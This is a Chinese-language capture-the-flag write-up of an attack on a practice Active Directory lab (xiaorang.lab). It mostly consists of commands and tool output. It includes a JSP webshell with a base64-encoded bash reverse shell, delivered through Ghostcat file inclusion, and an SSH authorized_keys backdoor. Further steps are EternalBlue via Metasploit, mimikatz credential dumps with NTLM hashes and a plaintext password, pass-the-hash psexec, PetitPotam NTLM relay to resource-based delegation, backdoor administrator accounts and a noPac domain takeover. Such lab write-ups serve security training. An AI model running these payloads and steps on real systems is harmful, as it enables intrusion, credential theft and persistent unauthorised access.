先来看一下考点
信息收集 先fscan扫一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 fscan.exe -h 39.98.116.168 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.3 start infoscan 39.98.116.168:8080 open 39.98.116.168:22 open 39.98.116.168:8009 open [*] alive ports len is: 3 start vulscan 已完成 3/3 [*] 扫描结束,耗时: 11.0582457s
发现8080和8009开着,先去看一下8080,发现是个后台
再扫一下后台目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 python3 dirsearch.py -u http://39.98.116.168:8080/ Target: http://39.98.116.168:8080/ [09:35:33] Starting: [09:35:33] 302 - 0B - /js -> /js/ [09:35:40] 200 - 114B - /404.html [09:35:40] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd [09:35:41] 400 - 795B - /a%5c.aspx [09:35:55] 200 - 7KB - /console.html [09:35:56] 302 - 0B - /css -> /css/ [09:35:56] 302 - 0B - /data -> /data/ [09:35:58] 302 - 0B - /docs -> /docs/ [09:35:58] 404 - 732B - /docs/CHANGELOG.html [09:35:58] 404 - 733B - /docs/export-demo.xml [09:35:58] 404 - 729B - /docs/_build/ [09:35:58] 404 - 731B - /docs/changelog.txt [09:35:58] 404 - 749B - /docs/html/admin/ch01s04.html [09:35:58] 404 - 747B - /docs/html/admin/index.html [09:35:58] 404 - 750B - /docs/html/developer/ch02.html [09:35:58] 404 - 733B - /docs/maintenance.txt [09:35:58] 404 - 730B - /docs/swagger.json [09:35:58] 404 - 749B - /docs/html/admin/ch03s07.html [09:35:58] 404 - 753B - /docs/html/developer/ch03s15.html [09:35:58] 404 - 737B - /docs/html/index.html [09:35:58] 200 - 17KB - /docs/ [09:35:58] 404 - 746B - /docs/html/admin/ch01.html [09:35:58] 404 - 730B - /docs/updating.txt [09:35:58] 200 - 132B - /download/ [09:35:58] 302 - 0B - /download -> /download/ [09:36:00] 302 - 0B - /examples -> /examples/ [09:36:00] 404 - 781B - /examples/jsp/%252e%252e/%252e%252e/manager/html/ [09:36:00] 200 - 1KB - /examples/ [09:36:00] 200 - 6KB - /examples/servlets/index.html [09:36:00] 200 - 14KB - /examples/jsp/index.html [09:36:00] 200 - 658B - /examples/servlets/servlet/CookieExample [09:36:00] 404 - 746B - /examples/servlet/SnoopServlet [09:36:00] 200 - 1KB - /examples/websocket/index.xhtml [09:36:00] 200 - 1KB - /examples/servlets/servlet/RequestHeaderExample [09:36:01] 200 - 685B - /examples/jsp/snp/snoop.jsp [09:36:03] 403 - 3KB - /host-manager/html [09:36:03] 403 - 3KB - /host-manager/ [09:36:04] 302 - 0B - /images -> /images/ [09:36:07] 302 - 0B - /lib -> /lib/ [09:36:09] 302 - 0B - /manager -> /manager/ [09:36:09] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage [09:36:09] 403 - 3KB - /manager/login [09:36:09] 403 - 3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE [09:36:09] 403 - 3KB - /manager/html/ [09:36:09] 403 - 3KB - /manager/admin.asp [09:36:09] 403 - 3KB - /manager/login.asp [09:36:09] 403 - 3KB - /manager/VERSION [09:36:09] 403 - 3KB - /manager/ [09:36:09] 403 - 3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS [09:36:09] 403 - 3KB - /manager/jmxproxy [09:36:09] 403 - 3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps= [09:36:09] 403 - 3KB - /manager/status/all [09:36:09] 403 - 3KB - /manager/html [09:36:09] 403 - 3KB - /manager/jmxproxy/?qry=STUFF [09:36:09] 403 - 3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY [09:36:29] 403 - 0B - /upload [09:36:29] 403 - 0B - /upload/1.php [09:36:29] 403 - 0B - /upload/2.php [09:36:29] 403 - 0B - /upload/loginIxje.php [09:36:29] 403 - 0B - /upload/test.txt [09:36:29] 403 - 0B - /upload/ [09:36:29] 403 - 0B - /upload/b_user.xls [09:36:29] 403 - 0B - /upload/b_user.csv [09:36:29] 403 - 0B - /upload/upload.php [09:36:29] 403 - 0B - /upload/test.php [09:36:29] 200 - 9KB - /user.html
版本号泄漏
CVE-2020-1983 Tomcat文件包含漏洞 https://github.com/00theway/Ghostcat-CNVD-2020-10487
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 python3 ajpShooter.py http://39.98.116.168:8080 8009 /WEB-INF/web.xml read _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test [<] 200 200 [<] Accept-Ranges: bytes [<] ETag: W/"2489-1670857638305" [<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT [<] Content-Type: application/xml [<] Content-Length: 2489 <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" > <web-app> <display-name>Archetype Created Web Application</display-name> <security-constraint> <display-name>Tomcat Server Configuration Security Constraint</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <url-pattern>/upload/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <error-page> <error-code>404</error-code> <location>/404.html</location> </error-page> <error-page> <error-code>403</error-code> <location>/error.html</location> </error-page> <error-page> <exception-type>java.lang.Throwable</exception-type> <location>/error.html</location> </error-page> <servlet> <servlet-name>HelloServlet</servlet-name> <servlet-class>com.example.HelloServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>HelloServlet</servlet-name> <url-pattern>/HelloServlet</url-pattern> </servlet-mapping> <servlet> <display-name>LoginServlet</display-name> <servlet-name>LoginServlet</servlet-name> <servlet-class>com.example.LoginServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>LoginServlet</servlet-name> <url-pattern>/LoginServlet</url-pattern> </servlet-mapping> <servlet> <display-name>RegisterServlet</display-name> <servlet-name>RegisterServlet</servlet-name> <servlet-class>com.example.RegisterServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>RegisterServlet</servlet-name> <url-pattern>/RegisterServlet</url-pattern> </servlet-mapping> <servlet> <display-name>UploadTestServlet</display-name> <servlet-name>UploadTestServlet</servlet-name> <servlet-class>com.example.UploadTestServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>UploadTestServlet</servlet-name> <url-pattern>/UploadServlet</url-pattern> </servlet-mapping> <servlet> <display-name>DownloadFileServlet</display-name> <servlet-name>DownloadFileServlet</servlet-name> <servlet-class>com.example.DownloadFileServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>DownloadFileServlet</servlet-name> <url-pattern>/DownloadServlet</url-pattern> </servlet-mapping> </web-app>
存为字典
1 python3 ajpShooter.py http://39.98.107.181:8080 8009 /WEB-INF/web.xml read |grep url-pattern |awk -F '>' '{print $2}' |awk -F '<' '{print $1}' >web-xml.dict
模糊测试
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ffuf -c -w web-xml.dict -u http://39.98.107.181:8080FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://39.98.107.181:8080FUZZ :: Wordlist : FUZZ: /root/yst/Ghostcat-CNVD-2020-10487-master/web-xml.dict :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ /upload/* [Status: 403, Size: 0, Words: 1, Lines: 1, Duration: 52ms] /RegisterServlet [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 53ms] /LoginServlet [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 53ms] /DownloadServlet [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 54ms] /UploadServlet [Status: 200, Size: 682, Words: 145, Lines: 24, Duration: 58ms] /HelloServlet [Status: 200, Size: 21, Words: 2, Lines: 2, Duration: 58ms] :: Progress: [6/6] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
测试upload,传🐎
1 2 3 4 5 6 7 8 9 10 <% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgveHh4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); %>
返回路径 ./upload/4332ca5e87df3ffe57f09321848a920a/20250326010633582.txt
vps起个监听
1 2 3 4 5 6 7 8 9 python3 ajpShooter.py http://39.98.116.168:8080/ 8009 /upload/4332ca5e87df3ffe57f09321848a920a/20250326010633582.txt eval _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test
找一下flag文件
1 find / -type f -name '*flag*' 2>/dev/null'
写公钥留后门
1 2 3 4 5 6 7 8 #自己的机器上 ssh-keygen -t rsa -b 4096 cat ~/.ssh/id_rsa.pub #弹的shell echo "~/.ssh/id_rsa.pub的内容" > /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys ssh -i ~/.ssh/id_rsa root@39.99.140.174
内网渗透 上代理,扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 ./fscan -h 172.22.11.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan (icmp) Target 172.22.11.76 is alive (icmp) Target 172.22.11.6 is alive (icmp) Target 172.22.11.26 is alive (icmp) Target 172.22.11.45 is alive [*] Icmp alive hosts len is: 4 172.22.11.26:445 open 172.22.11.45:445 open 172.22.11.6:445 open 172.22.11.45:139 open 172.22.11.26:139 open 172.22.11.26:135 open 172.22.11.6:139 open 172.22.11.45:135 open 172.22.11.6:135 open 172.22.11.76:22 open 172.22.11.6:88 open 172.22.11.76:8080 open 172.22.11.76:8009 open [*] alive ports len is: 13 start vulscan [*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B [*] NetInfo [*]172.22.11.26 [->]XR-LCM3AE8B [->]172.22.11.26 [*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC [*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [*] NetInfo [*]172.22.11.6 [->]XIAORANG-DC [->]172.22.11.6 [*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理 已完成 13/13 [*] 扫描结束,耗时: 8.210849878s
分析
1 2 3 4 172.22.11.45 XR-Desktop.xiaorang.lab 172.22.11.6 xiaorang-dc.xiaorang.lab 172.22.11.26 XR-LCM3AE8B.xiaorang.lab 172.22.11.76 本机
永恒之蓝 45扫到ms17-010
1 2 3 4 5 proxychains msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.11.45 exploit
去admin目录下找到flag
抓hash
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- XR-DESKTOP$ XIAORANG 37fd17d6c6653c4e65093e33f50f7d3d e774d3db0995fc0b8469093eb208aa7ece5abb9f yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) XR-DESKTOP$ XIAORANG 78 3f 3f 97 ea 43 e5 10 7e f8 16 06 4a 55 3d 95 51 a3 5b 02 6a a3 7b 76 c9 b3 34 88 d5 eb 8c 98 74 c1 4e 10 2b 13 b4 49 5 4 ff c2 b1 3d 56 0c ce 6b 40 29 4c 83 d1 3d c9 dd 11 87 68 03 54 9f cc f7 c9 ce 53 1d 34 de 90 13 b9 a7 72 09 b7 bd 87 dc a6 cb 5e 77 a7 43 0e fe a1 ac 9b db 91 db 38 92 be e9 d5 cf 1a d2 33 08 e7 94 04 ac 9a 7a 1b df 73 0d ee b2 db fd 43 ca 97 ff 6b 2e 1e c0 d4 03 73 56 56 f6 59 7c b7 6b 4e 0d df 54 3f 4f 85 df a8 05 39 22 f3 84 ad 90 d3 a7 b6 52 55 d1 4f 89 0 2 5d 78 91 b1 f2 4b a5 8d aa 73 34 6e d0 17 7c 2d a4 57 21 f3 40 a7 b5 3a 87 a5 c3 fc 99 87 6a 72 22 b3 83 49 b9 1b b6 79 68 a5 83 6d 49 5f 71 c2 dd 2d da 19 c9 ff 22 2c ce e3 96 e7 68 0d 42 1c 84 e4 68 8f ce 80 c7 76 aa 44 9e c4 e8 85 yangmei XIAORANG xrihGHgoNZQ kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) xr-desktop$ XIAORANG.LAB 78 3f 3f 97 ea 43 e5 10 7e f8 16 06 4a 55 3d 95 51 a3 5b 02 6a a3 7b 76 c9 b3 34 88 d5 eb 8c 98 74 c1 4e 10 2b 13 b4 49 54 ff c2 b1 3d 56 0c ce 6b 40 29 4c 83 d1 3d c9 dd 11 87 68 03 54 9f cc f7 c9 ce 53 1d 34 de 90 13 b9 a7 72 09 b7 bd 87 dc a6 cb 5e 77 a7 43 0e fe a1 ac 9b db 91 db 38 92 be e9 d5 cf 1a d2 33 08 e7 94 04 ac 9a 7a 1b df 73 0d ee b2 db fd 43 ca 97 ff 6b 2e 1e c0 d4 03 73 56 56 f6 59 7c b7 6b 4e 0d df 54 3f 4f 85 df a8 05 39 22 f3 84 ad 90 d3 a7 b6 52 55 d1 4f 89 02 5d 78 91 b1 f2 4b a5 8d aa 73 34 6e d0 17 7c 2d a4 57 21 f3 40 a7 b5 3a 87 a5 c3 fc 99 87 6a 72 22 b3 83 49 b9 1b b6 79 68 a5 83 6d 49 5f 71 c2 dd 2d da 19 c9 ff 22 2c ce e3 96 e7 68 0d 42 1c 84 e4 68 8f ce 80 c7 76 aa 44 9e c4 e8 85 xr-desktop$ XIAORANG.LAB (null) yangmei XIAORANG.LAB xrihGHgoNZQ
hashdump
1 2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
再收集下域内信息,这里多种工具都可以选择,我们选择yangmei这个用户,把他加到管理员组中
1 proxychains4 python3 psexec.py Administrator@172.22.11.45 -hashes :48f6da83eb89a4da8a1cc963b855a799 -codec gbk
1 net localgroup administrators yangmei /add
域内信息收集
1 proxychains4 bloodhound-python -u yangmei -p xrihGHgoNZQ -d XIAORANG.LAB --dns-tcp -ns 172.22.11.6 -c all --zip
分析
1 2 3 4 5 6 7 1、使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破,没发现其他新用户 2、MAQ = 0,加不了计算机 3、当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制 4、域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL 5、域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName 6、域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam 7、NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
扫描WebClient和petitpotam
1 2 proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
参考:https://forum.butian.net/share/1944 发现我们可以用Petitpotam强制目标服务器、目标用户使用LM Hash、NTLM Hash对我们的服务器进行认证,然后我们可以将该认证中继至其他目标服务器中以达到横向、提权等的目的,这里只有172.22.11.26有Petitpotam。通过WebDav进行NTLM Relay的好处在于可以不受到协议签名的影响,对本地内部网或受信任的站点自动使用当前用户凭据进行NTLM认证。
使用无ADCS + Petitpotam + ntlm中继打法,思路是用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的msDS-AllowedToActOnBehalfOfOtherIdentity属性,配置到XR-LCM3AE8B.xiaorang.lab的RBCD。
但这里有个条件,需要我们把服务器端口的流量转发到客户端本地的80,但SSH的反向端口转发监听的时候只会监听127.0.0.1,这里我们让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0
1 2 ssh -i ~/.ssh/id_rsa root@39.98.107.181 -D SOCKS代理IP:PORT -R \*:79:127.0.0.1:80 nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ssh:使用 SSH 连接远程服务器。 -i ~/.ssh/id_rsa:指定 SSH 私钥 id_rsa 进行身份认证。 root@39.99.139.181:以 root 用户身份连接 39.99.139.181 这台远程服务器。 -D socksip:port: -D 选项开启 SOCKS 代理,即在本地 socksip:port 上启动一个动态端口转发代理。 所有经由这个代理的流量都会通过 39.99.139.181 这台服务器转发,类似于 翻墙代理(SOCKS5 代理)。 -R \*:79:127.0.0.1:80: -R 选项表示 远程端口转发。 \*: 表示绑定到所有网卡(即允许任意 IP 访问这个端口)。 79:127.0.0.1:80 表示: 远程服务器 (39.99.139.181) 的 79 端口 会转发到 本地(SSH 客户端所在机器)的 127.0.0.1:80 端口。 socat:一个强大的网络工具,常用于端口转发和代理。 TCP-LISTEN:80,fork,bind=0.0.0.0: TCP-LISTEN:80:监听 本机 80 端口,等待 TCP 连接。 fork:每次有新连接时,自动创建一个子进程处理连接(防止阻塞)。 bind=0.0.0.0:监听 所有 IP(外部和本地) 的请求。 TCP:localhost:79: 当收到 80 端口的请求,会将流量 转发到 localhost:79 端口。
可以看到这里流量已经成功转发,curl 172.22.11.76的流量转发到了我们本地kali
1 2 nc -lvvp 80 proxychains curl http://172.22.11.76:80
Relay via WebDAV+Petitpotam的Coerce Authentication 接着本地开启开启ntlmrelayx,利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD,接着使用Petitpotam 触发XR-LCM3AE8B认证到172.22.11.76
1 2 3 4 proxychains python3 ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access 然后打petitpotam强制认证 proxychains python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26
基于资源的约束委派 配好后直接用之前172.22.11.45上抓的机器账户XR-DESKTOP$哈希打172.22.11.26的RBCD,拿白银票据
改个名字
1 2 3 4 5 6 proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :37fd17d6c6653c4e65093e33f50f7d3d xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6 export KRB5CCNAME=administrator.ccache sudo vim /etc/hosts#把XR-LCM3AE8B.xiaorang.lab的ip加到hosts里 172.22.11.26 XR-LCM3AE8B.xiaorang.lab
导入ccache后,最后即可无密码连接
1 proxychains python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
flag{681cae09-6e26-4714-87d8-e1e52d014bcc}
nopac 添加后门用户进行rdp
1 2 net user calmsec admin@123 /add net localgroup administrators calmsec /add
rdp26,登录的时候发现有用户在登录,传🥝抓一下hash
1 .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt
加管理员账户,rdp上去,用猕猴桃可以抓到一个zhanghui用户的哈希1232126b24cdf8c9bd2f788a9d7c7ed1,他在MA_Admin组,对computer能够创建对象,能向域中添加机器账户,所以能打noPac
https://github.com/Ridter/noPac
1 proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
